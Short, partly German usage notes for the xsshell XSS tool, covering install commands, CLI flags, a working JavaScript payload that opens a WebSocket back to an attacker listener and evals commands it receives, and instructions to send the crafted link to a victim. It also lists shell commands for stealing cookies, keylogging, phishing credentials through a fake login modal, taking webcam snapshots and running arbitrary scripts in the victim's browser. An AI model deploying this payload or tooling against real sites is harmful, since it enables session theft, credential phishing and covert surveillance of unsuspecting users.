git clone

• sudo apt-get install go
• go get github.com/raz-varren/xsshell
• go install github.com/raz-varren/xsshell

start

• ./xsshell -host 127.0.0.1 -port 4444

xsshell -h Usage of xsshell:

 -cert string
   	ssl cert file
 -host string
   	websocket listen address
 -key string
   	ssl key file
 -log string
   	specify a log file to log all console communication
 -path string
   	websocket connection path (default "/s")
 -port string
   	websocket listen port (default "8234")
 -servdir string
   	specify a directory to serve files from. a file server will not be started if no directory is specified
 -servpath string
   	specify the base url path that you want to serve files from (default "/static/")
 -wrkdir string
   working directory that will be used as the relative root path for any commands requiring user provided file paths

Payload

• Payload muss ins Eingabefeld
• Generierter Link wird zum Opfer geschickt

JS Script Payload :

<script>(function(){function e(a,b){return function(){return eval(a)}.call(b)}var d=new WebSocket("ws://127.0.0.1:4444/s"),f=function(a){this.send=function(b,c){d.send((c?"z":"")+a+b)}};d.onmessage=function(a){a=a.data;var b=new f(a.slice(0,8));try{e(a.slice(8),b)}catch(c){b.send(c,!0)}}})();</script>

Die Shell

   start socket: 1, header: AqHFTtA
   socket connected: 1
   user agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 
   page url:   http://127.0.0.1/xss.php?msg=?
   referrer:   http://127.0.0.1/xss.php?msg=?
   cookies:

xsshell

• listening for sockets on :port, at url path: /s
• starting console
• type \? to list available commands

• xsshell > \?
• xsshell > \help \? \h: list available commands
• xsshell > \alert: send an alert message to the target set usage: \alert ALERT_MESSAGE
• xsshell > \cs: get the current cookies from the target set's current page and any cookie updates.
• xsshell > \ct: crash the target set's tab
• xsshell > \emd: return a list of media devices accessible to the target set's browser
• xsshell > \ex: print out the client exploit javascript
• xsshell > \exm: print out the minified version of the client exploit javascript
• xsshell > \gi: download all images on the target set's page.

• xsshell > \kl: start a keylogger on the target set
• xsshell > \ll: list out any links found on the target set's currently open page
• xsshell > \pfl: open a modal on the target set's page prompting them for a username and password
• xsshell > \ps: print out socket info for all actively connected websockets
• xsshell > \q: exit this program
• xsshell > \sf: send a javascript file to the target set and execute it.

• xsshell > \sfl: resend the last file that was sent using \sf, includes any new changes to the file
• xsshell > \src: get the target set's currently rendered page source
• xsshell > \st: set the websockets to target. one or more targets can be set with the following methods:

        * xsshell >              8        -target a single websocket connection belonging to that id number
        * xsshell >              1,2,8,10 -targets all websocket IDs in the comma separated list

• xsshell > \wcs: attempt to take a snapshot from the target set's webcam, if one is available. images will be stored in DOWNLOAD_DIR.

• xsshell > \xhr: send an xhr request from the target set's current page

        * xsshell >                  usage: \xhr HTTP_METHOD FULL_URL [CONTENT_HEADER] [POST_BODY]

Links

• https://github.com/raz-varren/xsshell